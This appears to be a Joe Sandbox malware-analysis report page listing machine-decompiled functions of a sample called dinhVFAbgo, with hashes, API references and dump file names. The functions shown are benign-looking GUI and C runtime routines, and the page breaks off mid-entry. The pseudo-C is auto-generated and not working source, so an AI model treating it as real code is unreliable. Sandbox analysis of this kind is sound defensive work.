Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Rect$ClientScreenWindow$H_prolog3_catchKillTimer
String ID:
API String ID: 307328177-0
Opcode ID: 41cc789e8cbe9132d966b5b145d60e84300120360a4ae4c8f658e184903658ff
Instruction ID: d53ff6ff719a117c6f0edb39ed984c0007b34314fac11a4c8aea7422a4c74e82
Opcode Fuzzy Hash: 41cc789e8cbe9132d966b5b145d60e84300120360a4ae4c8f658e184903658ff
Instruction Fuzzy Hash: E1313771A0021AAFCF10DFA4D945AEE7FB9EF08740F14406AF809B7281DB319E159BB1

Uniqueness

Uniqueness Score: -1.00%

Function 00CD0526 Relevance: 6.1, APIs: 4, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00CD0526(void* __ecx, intOrPtr _a8) {
				char _v8;
				struct tagPOINT _v16;
				void* __ebx;
				void* __ebp;
				void* _t35;
				intOrPtr* _t49;
				void* _t60;
				void* _t61;

				_t61 = __ecx;
				if(_a8 != 1) {
					L14:
					return E00CB236A(_t49, _t61, __eflags);
				}
				_v16.x = 0;
				_v16.y = 0;
				GetCursorPos( &_v16);
				ScreenToClient( *(_t61 + 0x20),  &_v16);
				if( *((intOrPtr*)(_t61 + 0x2fc)) == 0 || E00DEC8A6(_t60, _v16.y -  *((intOrPtr*)(_t61 + 0x334)) - 4) > 2) {
					__eflags = _v16.y -  *((intOrPtr*)(_t61 + 0x334));
					if(__eflags > 0) {
						goto L14;
					}
					_t35 = E00DEC8A6(_t60, _v16.x -  *((intOrPtr*)(_t61 + 0x358)) -  *((intOrPtr*)(_t61 + 0x328)));
					__eflags = _t35 - 2;
					if(_t35 > 2) {
						_t49 = E00CCDF11(_t61, _t60, _v16.x, _v16.y,  &_v8, 0);
						__eflags = _t49;
						if(__eflags == 0) {
							goto L14;
						}
						__eflags = _t49 -  *((intOrPtr*)(_t61 + 0x3d8));
						if(__eflags != 0) {
							goto L14;
						}
						__eflags = _v8 - 2;
						if(__eflags != 0) {
							goto L14;
						}
						_push(_v16.y);
						__eflags = PtInRect(_t49 + 0x40, _v16);
						if(__eflags != 0) {
							goto L14;
						}
						 *0xe17a64();
						__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t49 + 0x50))))();
						if(__eflags != 0) {
							goto L5;
						}
						goto L14;
					}
					SetCursor( *(E00CC19ED() + 0xf0));
					goto L4;
				} else {
					SetCursor( *(E00CC19ED() + 0xf4));
					L4:
					L5:
					return 1;
				}
			}

0x00cd0533
0x00cd0535
0x00cd0619
0x00000000
0x00cd061b
0x00cd0541
0x00cd0544
0x00cd0547
0x00cd0554
0x00cd0560
0x00cd0596
0x00cd059c
0x00000000
0x00000000
0x00cd05ae
0x00cd05b4
0x00cd05b7
0x00cd05d8
0x00cd05da
0x00cd05dc
0x00000000
0x00000000
0x00cd05de
0x00cd05e4
0x00000000
0x00000000
0x00cd05e6
0x00cd05ea
0x00000000
0x00000000
0x00cd05ec
0x00cd05fc
0x00cd05fe
0x00000000
0x00000000
0x00cd0607
0x00cd0611
0x00cd0613
0x00000000
0x00000000
0x00000000
0x00cd0613
0x00cd0585
0x00000000
0x00cd057a
0x00cd0585
0x00cd0585
0x00cd058b
0x00000000
0x00cd058d

APIs

GetCursorPos.USER32(00000001), ref: 00CD0547
ScreenToClient.USER32 ref: 00CD0554
SetCursor.USER32(?), ref: 00CD0585
PtInRect.USER32(?,00000001,?), ref: 00CD05F6

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Cursor$ClientRectScreen
String ID:
API String ID: 2390797981-0
Opcode ID: a8bdadd598d71728aed60d9bd8f47b9757645e51af4423b9d90ccc0cd85789ec
Instruction ID: 02ac10254b630e69aea5fb4cc4f91ebbf6fdd6cfae315f73b340d40a351747b0
Opcode Fuzzy Hash: a8bdadd598d71728aed60d9bd8f47b9757645e51af4423b9d90ccc0cd85789ec
Instruction Fuzzy Hash: 3031B131A00909EFCF159FA9D984EADBBB9FF44704F10006AF915A2211EB30DB15CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00CC7494 Relevance: 6.1, APIs: 4, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00CC7494(void* __ecx, void* __edx, void* __esi) {
				RECT* _v8;
				intOrPtr _v12;
				void* __ebx;
				intOrPtr _t18;
				signed int _t24;
				void* _t28;
				intOrPtr _t29;
				intOrPtr _t31;
				void* _t38;
				void* _t40;
				void* _t44;

				_t38 = __edx;
				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_push(_t28);
				_t40 = __ecx;
				_t18 = E00CB277F(_t28, _t32, _t38, GetParent( *(__ecx + 0x20)));
				_t29 = _t18;
				_v12 = _t29;
				if(_t29 == 0) {
					L14:
					return _t18;
				}
				_t33 = _t40;
				_t18 = E00CB7881(_t40);
				if(_t18 == 0) {
					goto L14;
				}
				_v8 = 0;
				_t18 = E00CB277F(_t29, _t33, _t38, GetNextDlgGroupItem( *(_t29 + 0x20),  *(_t40 + 0x20), 0));
				_t31 = _t18;
				if(_t31 != _t40) {
					while(_t31 != 0) {
						_t44 = E00CACA6C(0xe1b488, _t31);
						_pop(_t36);
						if(_t44 != 0 &&  *((intOrPtr*)(_t44 + 0xc8)) != 0) {
							_t24 = E00CB778C(_t44);
							_t36 = 0x10000;
							if((0x00010000 & _t24) != 0) {
								_t36 = _t44;
								E00CB78AC(_t44, 0x10000, 0, 0);
								_v8 = 1;
							}
							if( *((intOrPtr*)(_t44 + 0xc0)) != 0) {
								 *((intOrPtr*)(_t44 + 0xc0)) = 0;
								RedrawWindow( *(_t44 + 0x20), 0, 0, 0x105);
							}
						}
						_t18 = E00CB277F(_t31, _t36, _t38, GetNextDlgGroupItem( *(_v12 + 0x20),  *(_t31 + 0x20), 0));
						_t31 = _t18;
						if(_t31 != _t40) {
							continue;
						} else {
							break;
						}
					}
					if(_v8 != 0) {
						_t18 = E00CB78AC(_t40, 0, 0x10000, 0);
					}
				}
			}

0x00cc7494
0x00cc7494
0x00cc7497
0x00cc7498
0x00cc7499
0x00cc749b
0x00cc74a7
0x00cc74ac
0x00cc74ae
0x00cc74b3
0x00cc7582
0x00cc7585
0x00cc7585
0x00cc74b9
0x00cc74bb
0x00cc74c2
0x00000000
0x00000000
0x00cc74ce
0x00cc74db
0x00cc74e0
0x00cc74e4
0x00cc74eb
0x00cc74fa
0x00cc74fd
0x00cc7500
0x00cc750d
0x00cc7512
0x00cc7519
0x00cc7520
0x00cc7522
0x00cc7527
0x00cc7527
0x00cc7536
0x00cc7542
0x00cc7548
0x00cc7548
0x00cc7536
0x00cc7560
0x00cc7565
0x00cc7569
0x00000000
0x00000000
0x00000000
0x00000000
0x00cc7569
0x00cc7570
0x00cc757d
0x00cc757d
0x00cc7570

APIs

GetParent.USER32(?), ref: 00CC74A0

Part of subcall function 00CB7881: IsWindowEnabled.USER32(?), ref: 00CB788C

GetNextDlgGroupItem.USER32(?,?,00000000), ref: 00CC74D4
GetNextDlgGroupItem.USER32(?,?,00000000), ref: 00CC7559

Part of subcall function 00CB778C: GetWindowLongA.USER32 ref: 00CB7799

RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 00CC7548

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Window$GroupItemNext$EnabledLongParentRedraw
String ID:
API String ID: 2934814974-0
Opcode ID: c446e70035e79370ce2e1b594d69510c19be0d6ca0b43e2140a8e824844a6c75
Instruction ID: 3f4f9bcee7759922dc662690fe3adc8164789c8f7c14faeb954b773d704396f6
Opcode Fuzzy Hash: c446e70035e79370ce2e1b594d69510c19be0d6ca0b43e2140a8e824844a6c75
Instruction Fuzzy Hash: 1521A771744300AFEB256BB0CC49FFE76A9EB48740F24462DF941A61E1EBB19E40EA54

Uniqueness

Uniqueness Score: -1.00%

Function 00CC82AB Relevance: 6.1, APIs: 4, Instructions: 76
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00CC82AB(void* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr __esi, void* __eflags) {
				intOrPtr* _t23;
				intOrPtr _t25;
				void* _t42;
				void* _t57;
				intOrPtr* _t59;
				LOGPALETTE* _t60;
				int _t62;
				void* _t65;

				_t61 = __esi;
				_t57 = __edx;
				_push(0x18);
				E00DDD52C(0xe093ec, __ebx, __edi, __esi);
				_t42 = __ecx;
				_t59 =  *((intOrPtr*)(__ecx + 0x800));
				_t67 = _t59;
				if(_t59 != 0) {
					_t61 =  *((intOrPtr*)( *_t59 + 4));
					 *0xe17a64(1);
					 *((intOrPtr*)( *((intOrPtr*)( *_t59 + 4))))();
				}
				_t23 = E00CA9583(_t67, 8);
				 *((intOrPtr*)(_t65 - 0x10)) = _t23;
				_t68 = _t23;
				if(_t23 == 0) {
					_t23 = 0;
					__eflags = 0;
				} else {
					 *(_t23 + 4) =  *(_t23 + 4) & 0x00000000;
					 *_t23 = 0xe1b91c;
				}
				_push(_t42);
				 *((intOrPtr*)(_t42 + 0x800)) = _t23;
				E00CB8FDD(_t42, _t65 - 0x24, _t57, _t59, _t61, _t68);
				 *(_t65 - 4) =  *(_t65 - 4) & 0x00000000;
				_t25 =  *((intOrPtr*)(_t65 + 8));
				_t69 = _t25;
				if(_t25 != 0) {
					_t62 = E00CC7A16(_t25);
					_push(8 + _t62 * 4);
					_t60 = E00CA95C0(__eflags);
					_t16 =  &(_t60->palPalEntry); // 0x4
					GetPaletteEntries( *( *((intOrPtr*)(_t65 + 8)) + 4), 0, _t62, _t16);
					_t60->palNumEntries = _t62;
					_t60->palVersion = 0x300;
				} else {
					_push(0x408);
					_t60 = E00CA95C0(_t69);
					_t11 =  &(_t60->palPalEntry); // 0x4
					GetSystemPaletteEntries( *(_t65 - 0x20), 0, 0x100, _t11);
					_t60->palVersion = 0x1000300;
				}
				E00CB9BC6(_t42,  *((intOrPtr*)(_t42 + 0x800)), _t60, CreatePalette(_t60));
				L00CA95BB(_t60);
				return E00DDD4FA(E00CB9150(_t65 - 0x24));
			}

0x00cc82ab
0x00cc82ab
0x00cc82ab
0x00cc82b2
0x00cc82b7
0x00cc82b9
0x00cc82bf
0x00cc82c1
0x00cc82c7
0x00cc82cc
0x00cc82d4
0x00cc82d4
0x00cc82d8
0x00cc82dd
0x00cc82e1
0x00cc82e3
0x00cc82f1
0x00cc82f1
0x00cc82e5
0x00cc82e5
0x00cc82e9
0x00cc82e9
0x00cc82f3
0x00cc82f7
0x00cc82fd
0x00cc8302
0x00cc8306
0x00cc8309
0x00cc830b
0x00cc833e
0x00cc8347
0x00cc834e
0x00cc8353
0x00cc835d
0x00cc8368
0x00cc836c
0x00cc830d
0x00cc830d
0x00cc8318
0x00cc831f
0x00cc8329
0x00cc832f
0x00cc832f
0x00cc837f
0x00cc8385
0x00cc8398

APIs

__EH_prolog3.LIBCMT ref: 00CC82B2
GetSystemPaletteEntries.GDI32(?,00000000,00000100,00000004), ref: 00CC8329
CreatePalette.GDI32(00000000), ref: 00CC8376

Part of subcall function 00CC7A16: GetObjectA.GDI32(?,00000002,?), ref: 00CC7A23

GetPaletteEntries.GDI32(00000000,00000000,00000000,00000004), ref: 00CC835D

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Palette$Entries$CreateH_prolog3ObjectSystem
String ID:
API String ID: 374951733-0
Opcode ID: 7f5859b768d16bd8a36334538ac431e0d269d7747d86e09bba0d7de572c52f1e
Instruction ID: 397015e67772111a8f1873c7d1fc22ee78d8961c493b270768f336b09e03ad91
Opcode Fuzzy Hash: 7f5859b768d16bd8a36334538ac431e0d269d7747d86e09bba0d7de572c52f1e
Instruction Fuzzy Hash: F32190316002019FDB05AF64C84AFEE7BB5FF49750F148059F909AB291EF709A08DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00D9138B Relevance: 6.1, APIs: 4, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00D9138B(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr* _t46;
				intOrPtr _t53;
				struct tagRECT* _t59;
				intOrPtr _t60;
				struct tagRECT* _t68;
				intOrPtr _t70;
				intOrPtr* _t71;
				intOrPtr* _t73;
				void* _t75;
				void* _t76;

				_t76 = __eflags;
				_push(8);
				E00DDD52C(0xe1267a, __ebx, __edi, __esi);
				_t70 = __ecx;
				 *((intOrPtr*)(_t75 - 0x10)) = __ecx;
				E00CFA361(__ebx, __ecx, __edi, __ecx, _t76);
				 *((intOrPtr*)(__ecx)) = 0xe30d4c;
				_t59 = __ecx + 0x26c;
				 *((intOrPtr*)(_t75 - 4)) = 0;
				_t59->left = 0;
				_t68 = __ecx + 0x27c;
				_t59->top = 0;
				_t46 = __ecx + 0x28c;
				_t59->right = 0;
				_t59->bottom = 0;
				_t68->left = 0;
				_t68->top = 0;
				_t68->right = 0;
				_t68->bottom = 0;
				 *_t46 = 0;
				 *((intOrPtr*)(_t46 + 4)) = 0;
				 *((intOrPtr*)(_t46 + 8)) = 0;
				 *((intOrPtr*)(_t46 + 0xc)) = 0;
				 *((intOrPtr*)(__ecx + 0x29c)) = 0;
				 *((intOrPtr*)(__ecx + 0x2a0)) = 0;
				E00CD7052(__ecx + 0x2a4);
				 *((char*)(_t75 - 4)) = 1;
				E00D914CB(_t59, __ecx + 0x2b0, _t68, __fp0, __ecx);
				_t71 = _t70 + 0x1010;
				 *((char*)(_t75 - 4)) = 2;
				 *((intOrPtr*)(_t75 - 0x14)) = _t71;
				E00CC5032(_t59, _t71, _t68, _t71, _t76);
				 *_t71 = 0xe30740;
				_t73 =  *((intOrPtr*)(_t75 - 0x10)) + 0x17b8;
				 *((char*)(_t75 - 4)) = 3;
				 *((intOrPtr*)(_t75 - 0x14)) = _t73;
				E00CC5032(_t59, _t73, _t68, _t73, _t76);
				 *_t73 = 0xe30740;
				SetRectEmpty(_t59);
				SetRectEmpty(_t68);
				_t60 =  *((intOrPtr*)(_t75 - 0x10));
				_t53 = 2;
				 *((intOrPtr*)(_t60 + 0x1090)) = _t53;
				 *((intOrPtr*)(_t60 + 0x1838)) = _t53;
				 *((intOrPtr*)(_t60 + 0x250)) = 0;
				 *((intOrPtr*)(_t60 + 0x124)) = 1;
				 *((intOrPtr*)(_t60 + 0x128)) = 0;
				 *((intOrPtr*)(_t60 + 0x264)) = 0;
				 *((intOrPtr*)(_t60 + 0x10a4)) = 0;
				 *((intOrPtr*)(_t60 + 0x184c)) = 0;
				 *((intOrPtr*)(_t60 + 0x268)) = 6;
				 *((intOrPtr*)(_t60 + 0x25c)) = 0;
				SetRectEmpty(_t60 + 0x28c);
				 *(_t60 + 0x254) =  *(_t60 + 0x254) | 0xffffffff;
				 *((intOrPtr*)(_t60 + 0x258)) = 0;
				 *((intOrPtr*)(_t60 + 0x260)) = 0;
				 *((intOrPtr*)(_t60 + 0x29c)) = 0;
				 *((intOrPtr*)(_t60 + 0x2a0)) = 0;
				return E00DDD4FA(_t60);
			}

0x00d9138b
0x00d9138b
0x00d91392
0x00d91397
0x00d91399
0x00d9139c
0x00d913a3
0x00d913a9
0x00d913af
0x00d913b2
0x00d913b4
0x00d913ba
0x00d913bd
0x00d913c3
0x00d913c6
0x00d913c9
0x00d913cb
0x00d913ce
0x00d913d1
0x00d913d4
0x00d913d6
0x00d913d9
0x00d913dc
0x00d913df
0x00d913e5
0x00d913f1
0x00d913fc
0x00d91401
0x00d91406
0x00d9140c
0x00d91412
0x00d91415
0x00d9141a
0x00d91423
0x00d91429
0x00d9142f
0x00d91432
0x00d91438
0x00d9143e
0x00d91445
0x00d9144b
0x00d91452
0x00d91453
0x00d91459
0x00d91466
0x00d9146c
0x00d91476
0x00d9147c
0x00d91482
0x00d91488
0x00d9148e
0x00d91498
0x00d9149e
0x00d914a4
0x00d914ad
0x00d914b3
0x00d914b9
0x00d914bf
0x00d914ca

APIs

__EH_prolog3.LIBCMT ref: 00D91392

Part of subcall function 00CFA361: __EH_prolog3.LIBCMT ref: 00CFA368
Part of subcall function 00CFA361: SetRectEmpty.USER32(?), ref: 00CFA55E

Part of subcall function 00CC5032: __EH_prolog3.LIBCMT ref: 00CC5039

SetRectEmpty.USER32(?), ref: 00D9143E
SetRectEmpty.USER32(?), ref: 00D91445
SetRectEmpty.USER32 ref: 00D9149E

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: EmptyRect$H_prolog3
String ID:
API String ID: 3752103406-0
Opcode ID: e68e477cbb8c1de32b148528b582a4be98ad91732938e8798ef4f32a2d3a03b5
Instruction ID: 30d827b8024a89ae0d1bd091c320fa5378033dc513ce5ce16912fbdaccec6591
Opcode Fuzzy Hash: e68e477cbb8c1de32b148528b582a4be98ad91732938e8798ef4f32a2d3a03b5
Instruction Fuzzy Hash: 7A31D1B08056118FCB159F18D5896CABBF4BF08710F1881BEE89DAF346CBB45544CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00DF4B3D Relevance: 6.1, APIs: 4, Instructions: 72
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 75%

			E00DF4B3D(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0xe68f54; // 0x6
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E00DF52BC(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E00DF5650(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E00DF52BC(__eflags,  *0xe68f54, _t51);
							if(__eflags != 0) {
								E00DF496B(_t51, 0xe89678);
								E00DF47C5(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E00DF52BC(__eflags,  *0xe68f54, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E00DF52BC(0,  *0xe68f54, 0);
							_push(0);
							L9:
							E00DF47C5();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E00DF527D(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0xe68f54; // 0x6
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E00DF45D9(_t39, _t43, _t49, _t53, _t60);
					asm("int3");
					_t5 =  *0xe68f54; // 0x6
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E00DF52BC(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E00DF5650(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E00DF52BC(__eflags,  *0xe68f54, _t60);
								if(__eflags != 0) {
									E00DF496B(_t60, 0xe89678);
									E00DF47C5(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E00DF52BC(__eflags,  *0xe68f54, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E00DF52BC(__eflags,  *0xe68f54, _t20);
								_push(_t60);
								L25:
								E00DF47C5();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E00DF527D(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0xe68f54; // 0x6
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E00DF45D9(_t39, _t43, _t49, _t53, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0xe68f54; // 0x6
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E00DF52BC(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E00DF5650(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E00DF52BC(__eflags,  *0xe68f54, _t54);
											if(__eflags != 0) {
												E00DF496B(_t54, 0xe89678);
												E00DF47C5(0);
												goto L45;
											} else {
												_t40 = 0;
												E00DF52BC(__eflags,  *0xe68f54, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E00DF52BC(0,  *0xe68f54, 0);
											_push(0);
											L41:
											E00DF47C5();
											goto L36;
										}
									}
								} else {
									_t54 = E00DF527D(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0xe68f54; // 0x6
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}

0x00df4b3d
0x00df4b3d
0x00df4b48
0x00df4b4a
0x00df4b4f
0x00df4b52
0x00df4b70
0x00df4b73
0x00df4b78
0x00df4b7a
0x00000000
0x00df4b7c
0x00df4b88
0x00df4b8b
0x00df4b8c
0x00df4b8e
0x00df4bb3
0x00df4bb5
0x00df4bce
0x00df4bd5
0x00df4bda
0x00000000
0x00df4bb7
0x00df4bb7
0x00df4bc0
0x00df4bc5
0x00000000
0x00df4bc5
0x00df4b90
0x00df4b90
0x00df4b90
0x00df4b99
0x00df4b9e
0x00df4b9f
0x00df4b9f
0x00df4ba4
0x00000000
0x00df4ba4
0x00df4b8e
0x00df4b54
0x00df4b5a
0x00df4b5e
0x00df4b6b
0x00000000
0x00df4b60
0x00df4b63
0x00df4bdd
0x00df4bdd
0x00df4b65
0x00df4b65
0x00df4b65
0x00df4b67
0x00df4b67
0x00df4b67
0x00df4b63
0x00df4b5e
0x00df4be0
0x00df4be8
0x00df4bea
0x00df4bec
0x00df4bf4
0x00df4bf9
0x00df4bfa
0x00df4bff
0x00df4c00
0x00df4c03
0x00df4c1d
0x00df4c20
0x00df4c25
0x00df4c27
0x00000000
0x00df4c29
0x00df4c35
0x00df4c38
0x00df4c39
0x00df4c3b
0x00df4c5e
0x00df4c60
0x00df4c77
0x00df4c7e
0x00df4c83
0x00000000
0x00df4c62
0x00df4c69
0x00df4c6e
0x00000000
0x00df4c6e
0x00df4c3d
0x00df4c44
0x00df4c49
0x00df4c4a
0x00df4c4a
0x00df4c4f
0x00000000
0x00df4c4f
0x00df4c3b
0x00df4c05
0x00df4c0b
0x00df4c0d
0x00df4c0f
0x00df4c18
0x00000000
0x00df4c11
0x00df4c11
0x00df4c14
0x00df4c8e
0x00df4c8e
0x00df4c93
0x00df4c96
0x00df4c97
0x00df4c98
0x00df4c9f
0x00df4ca1
0x00df4ca6
0x00df4ca9
0x00df4cc7
0x00df4cca
0x00df4ccf
0x00df4cd1
0x00000000
0x00df4cd3
0x00df4cdf
0x00df4ce3
0x00df4ce5
0x00df4d0a
0x00df4d0c
0x00df4d25
0x00df4d2c
0x00000000
0x00df4d0e
0x00df4d0e
0x00df4d17
0x00df4d1c
0x00000000
0x00df4d1c
0x00df4ce7
0x00df4ce7
0x00df4ce7
0x00df4cf0
0x00df4cf5
0x00df4cf6
0x00df4cf6
0x00000000
0x00df4cfb
0x00df4ce5
0x00df4cab
0x00df4cb1
0x00df4cb3
0x00df4cb5
0x00df4cc2
0x00000000
0x00df4cb7
0x00df4cb7
0x00df4cba
0x00df4d34
0x00df4d34
0x00df4cbc
0x00df4cbc
0x00df4cbc
0x00df4cbc
0x00df4cbe
0x00df4cbe
0x00df4cbe
0x00df4cba
0x00df4cb5
0x00df4d37
0x00df4d3f
0x00df4d41
0x00df4d41
0x00df4d48
0x00df4c16
0x00df4c86
0x00df4c86
0x00df4c88
0x00000000
0x00df4c8a
0x00df4c8d
0x00df4c8d
0x00df4c88
0x00df4c14
0x00df4c0f
0x00df4bee
0x00df4bf3
0x00df4bf3

APIs

GetLastError.KERNEL32(?,00000000,?,00DE30DC,00000000,00000000,?,?,00DE295D,00000000,00000000,00000000), ref: 00DF4B42
_free.LIBCMT ref: 00DF4B9F
_free.LIBCMT ref: 00DF4BD5
SetLastError.KERNEL32(00000000,00000006,000000FF,?,00DE295D,00000000,00000000,00000000), ref: 00DF4BE0

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: e73b67adc25e38b48bb165e0ec6c44b188d0d8099443e2bfa001c4a367ba5da5
Instruction ID: 22fdec30989ad6d0f45a442c8d636741075150bc5d3b76755b1cd85eb113494f
